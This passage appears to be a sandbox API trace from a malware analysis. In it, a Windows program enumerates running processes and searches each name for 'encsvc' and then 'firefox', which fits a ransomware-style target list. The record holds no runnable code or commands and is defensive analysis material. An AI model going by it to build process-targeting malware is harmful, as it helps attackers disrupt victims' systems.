cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0094.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0094.764] StrStrIA (lpFirst="saying.exe", lpSrch="encsvc") returned 0x0 [0094.764] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0094.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.766] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571660 [0094.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3571660, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0094.766] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0094.766] StrStrIA (lpFirst="ripe.exe", lpSrch="encsvc") returned 0x0 [0094.766] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0094.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.767] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35715e8 [0094.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35715e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0094.767] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0094.767] StrStrIA (lpFirst="acoustic.exe", lpSrch="encsvc") returned 0x0 [0094.767] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0094.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.786] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571708 [0094.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3571708, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0094.787] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0094.787] StrStrIA (lpFirst="mail.exe", lpSrch="encsvc") returned 0x0 [0094.787] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0094.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.788] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571618 [0094.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3571618, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0094.788] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0094.788] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="encsvc") returned 0x0 [0094.788] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.789] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571690 [0094.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571690, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.789] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.790] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.790] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.791] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571600 [0094.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.791] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0094.791] StrStrIA (lpFirst="dllhost.exe", lpSrch="encsvc") returned 0x0 [0094.791] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.793] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571630 [0094.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3571630, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.793] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.793] StrStrIA (lpFirst="taskhostw.exe", lpSrch="encsvc") returned 0x0 [0094.793] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0094.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.794] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571678 [0094.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3571678, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0094.794] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0094.794] StrStrIA (lpFirst="UsoClient.exe", lpSrch="encsvc") returned 0x0 [0094.794] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.795] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571540 [0094.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3571540, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.796] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.796] StrStrIA (lpFirst="taskhostw.exe", lpSrch="encsvc") returned 0x0 [0094.796] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0094.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0094.797] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x356cc68 [0094.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x356cc68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0094.797] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0094.797] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="encsvc") returned 0x0 [0094.797] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0094.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.798] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356cc88 [0094.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x356cc88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0094.799] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0094.799] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="encsvc") returned 0x0 [0094.799] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0094.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.801] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a858 [0094.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356a858, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0094.801] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0094.801] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="encsvc") returned 0x0 [0094.801] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.802] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571570 [0094.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571570, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.802] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0094.802] StrStrIA (lpFirst="conhost.exe", lpSrch="encsvc") returned 0x0 [0094.802] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.804] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35716a8 [0094.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35716a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0094.804] StrStrIA (lpFirst="conhost.exe", lpSrch="encsvc") returned 0x0 [0094.804] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.805] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571588 [0094.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.805] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.805] StrStrIA (lpFirst="svchost.exe", lpSrch="encsvc") returned 0x0 [0094.805] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0094.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.807] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35716c0 [0094.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x35716c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0094.807] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0094.807] StrStrIA (lpFirst="rxodge.exe", lpSrch="encsvc") returned 0x0 [0094.807] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0094.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.808] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35715a0 [0094.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35715a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0094.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0094.808] StrStrIA (lpFirst="sppsvc.exe", lpSrch="encsvc") returned 0x0 [0094.808] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0094.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.809] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356cfa8 [0094.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x356cfa8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0094.809] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0094.809] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="encsvc") returned 0x0 [0094.810] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0094.810] CloseHandle (hObject=0x358) returned 1 [0094.810] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0094.826] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.828] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356cce8 [0094.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x356cce8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0094.828] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0094.828] StrStrIA (lpFirst="[System Process]", lpSrch="firefox") returned 0x0 [0094.828] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0094.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0094.829] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x35478d8 [0094.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x35478d8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0094.830] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0094.830] StrStrIA (lpFirst="System", lpSrch="firefox") returned 0x0 [0094.830] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0094.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.831] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35715b8 [0094.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35715b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0094.831] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0094.831] StrStrIA (lpFirst="smss.exe", lpSrch="firefox") returned 0x0 [0094.831] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.832] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35716d8 [0094.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35716d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0094.832] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0094.832] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox") returned 0x0 [0094.832] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0094.833] 